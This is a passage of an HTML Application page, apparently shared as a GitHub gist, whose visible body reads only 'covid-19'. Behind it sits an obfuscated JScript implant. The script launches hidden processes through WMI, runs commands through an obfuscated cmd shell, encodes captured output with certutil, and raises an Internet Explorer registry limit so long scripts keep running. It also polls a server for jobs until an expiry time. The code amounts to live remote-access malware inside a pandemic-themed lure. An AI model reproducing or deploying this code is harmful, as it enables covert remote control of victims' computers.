{var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");var query="Select * From Win32_Process";return wmi.ExecQuery(query);} | |
USZOOYWIZS.XDGAVBPIRF={};USZOOYWIZS.XDGAVBPIRF.ZNGQDUNJPL=0x80000000;USZOOYWIZS.XDGAVBPIRF.RZJJYUNYBI=0x80000001;USZOOYWIZS.XDGAVBPIRF.JLKBWUKRUQ=0x80000002;USZOOYWIZS.XDGAVBPIRF.RGYFSUKIII=0;USZOOYWIZS.XDGAVBPIRF.PRZCWOLURK=1;USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM=2;USZOOYWIZS.XDGAVBPIRF.NTOSBUVLVG=3;USZOOYWIZS.XDGAVBPIRF.XONKHXSJHM=function(computer) | |
{var computer=(typeof(computer)!=="undefined")?computer:".";var reg=GetObject("winmgmts:\\\\"+computer+"\\root\\default:StdRegProv");return reg;} | |
USZOOYWIZS.XDGAVBPIRF.VIUNPHBKRR=function(hKey,path,key,value,valType,computer) | |
{var reg=USZOOYWIZS.XDGAVBPIRF.XONKHXSJHM(computer);reg.CreateKey(hKey,path);if(valType==USZOOYWIZS.XDGAVBPIRF.RGYFSUKIII) | |
reg.SetStringValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM) | |
reg.SetDWORDValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.NTOSBUVLVG) | |
reg.SetQWORDValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.PRZCWOLURK) | |
reg.SetBinaryValue(hKey,path,key,value);} | |
USZOOYWIZS.CMXWOMTDOO={};USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME=function(cmd) | |
{var SW_HIDE=0;var pid=0;var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") | |
var si=wmi.Get("Win32_ProcessStartup").SpawnInstance_();si.ShowWindow=SW_HIDE;si.CreateFlags=16777216;si.X=si.Y=si.XSize=si.ySize=1;var w32proc=wmi.Get("Win32_Process");var method=w32proc.Methods_.Item("Create");var inParams=method.InParameters.SpawnInstance_();inParams.CommandLine=cmd;inParams.CurrentDirectory=null;inParams.ProcessStartupInformation=si;var outParams=w32proc.ExecMethod_("Create",inParams);return outParams.ProcessId;} | |
USZOOYWIZS.PUZLNFITWY={};USZOOYWIZS.PUZLNFITWY.GXJDCREARQ=function(cmd,stdOutPath) | |
{cmd="chcp "+USZOOYWIZS.FSZGCSETMH.RLUXESGUDE()+" & "+cmd;var c="cmd /c %c^oms^pec%^ /q /c "+cmd+" 1> "+USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(stdOutPath);c+=" 2>&1";USZOOYWIZS.VYAUWFCEQB.Run(c,0,true);if(USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM()=="936") | |
{var data=USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ(stdOutPath);} | |
else | |
{var data=USZOOYWIZS.WXUXMBSDFO.KPPKUQVGHI(stdOutPath);} | |
USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW(stdOutPath);return data;} | |
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP=function(cmd,fork) | |
{var fork=(typeof(fork)!==rsS("denifednu"))?fork:true;var c="cmd /c %c^oms^pe^c% /q /c "+cmd;USZOOYWIZS.VYAUWFCEQB.Run(cmd,5-5,!fork);} | |
USZOOYWIZS.WXUXMBSDFO={};USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW=function(path) | |
{return USZOOYWIZS.VYAUWFCEQB.ExpandEnvironmentStrings(path);} | |
USZOOYWIZS.WXUXMBSDFO.KKJQGQQLNJ=function() | |
{var base=USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW("%WINDIR%");var syswow64=base+"\\SysWOW64\\";if(USZOOYWIZS.BZIYSEPGNF.FolderExists(syswow64)) | |
return syswow64;return base+"\\System32\\";} | |
USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ=function(path) | |
{var loopcount=0;while(true) | |
{if(USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)).Size>0) | |
{try | |
{var fd=USZOOYWIZS.BZIYSEPGNF.OpenTextFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path),1,false,0);var data=fd.ReadAll();fd.Close();return data;} | |
catch(e) | |
{USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);continue;}} | |
else | |
{loopcount+=1;if(loopcount>180) | |
{return"";} | |
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);}}} | |
USZOOYWIZS.WXUXMBSDFO.KPPKUQVGHI=function(path,exists,certutil) | |
{var exists=(typeof(exists)!==rsS("denifednu"))?exists:false;var certutil=(typeof(certutil)!==rsS("denifednu"))?certutil:false;if(!USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&exists) | |
{var headers={};headers[rsS("sut"+"atS")]="Not"+"Exist";USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK("",headers);return"";} | |
var loopcount=0;while(true) | |
{if(USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)).Size>0) | |
{if(USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM()=="936"||certutil) | |
{var newout="%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".l"+"og";USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("certut"+"il -encode "+USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)+" "+newout);var data=USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ(newout);USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW(newout);} | |
else | |
{var fp=USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path));var fd=fp.OpenAsTextStream();var data=fd.read(fp.Size);fd.close();} | |
return data;} | |
else | |
{loopcount+=1;if(loopcount>180) | |
{return"";} | |
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);}}} | |
USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW=function(path) | |
{USZOOYWIZS.BZIYSEPGNF.DeleteFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path),true);};try | |
{if(USZOOYWIZS.TNHTOGCTIG!="prfx") | |
{if(USZOOYWIZS.DYPJQVFPFC()) | |
{var path="SOFT"+"WARE\\Mi"+"crosoft\\I"+"nternet Explor"+"er\\St"+"yles";var key="Ma"+"xScriptStat"+"ements";USZOOYWIZS.XDGAVBPIRF.VIUNPHBKRR(USZOOYWIZS.XDGAVBPIRF.RZJJYUNYBI,path,key,0xFFFFFFFF,USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM);} | |
USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK(USZOOYWIZS.FSZGCSETMH.IAPTOFSEZA());try{USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX("");}catch(e){USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH(e)} | |
USZOOYWIZS.IQSPUIAMOB();} | |
else | |
{if(USZOOYWIZS.DYPJQVFPFC()) | |
CanHelpTimeout();else | |
CanHelpLoop();}} | |
catch(e) | |
{USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH(e);} | |
function CanHelp() | |
{var epoch=new Date().getTime();var expire=parseInt(USZOOYWIZS.HIJJAGKENR);if(epoch>expire) | |
{return 0;} | |
try | |
{var work=USZOOYWIZS.JLOOXOZDZT.KEYOMPGODE();if(work.status==201||work.status==202||work.status==200) | |
{if(work.responseText.length>0){var jobkey=work.responseText;USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX(jobkey,work.status==202);}} | |
else | |
{return 0;}} | |
catch(e) | |
{return 0;} | |
return 1;} | |
function CanHelpLoop() | |
{var an="undefined";while(CanHelp());USZOOYWIZS.IQSPUIAMOB();} | |
function CanHelpTimeout() | |
{var sn="undefined";for(var i=(1-1);i<(5*5-15);++i) | |
{if(!CanHelp()) | |
{USZOOYWIZS.IQSPUIAMOB();return;}} | |
if(sn=="undefined"){USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX("");USZOOYWIZS.IQSPUIAMOB();}} | |
</script> | |
</head> | |
<body> | |
covid-19 | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment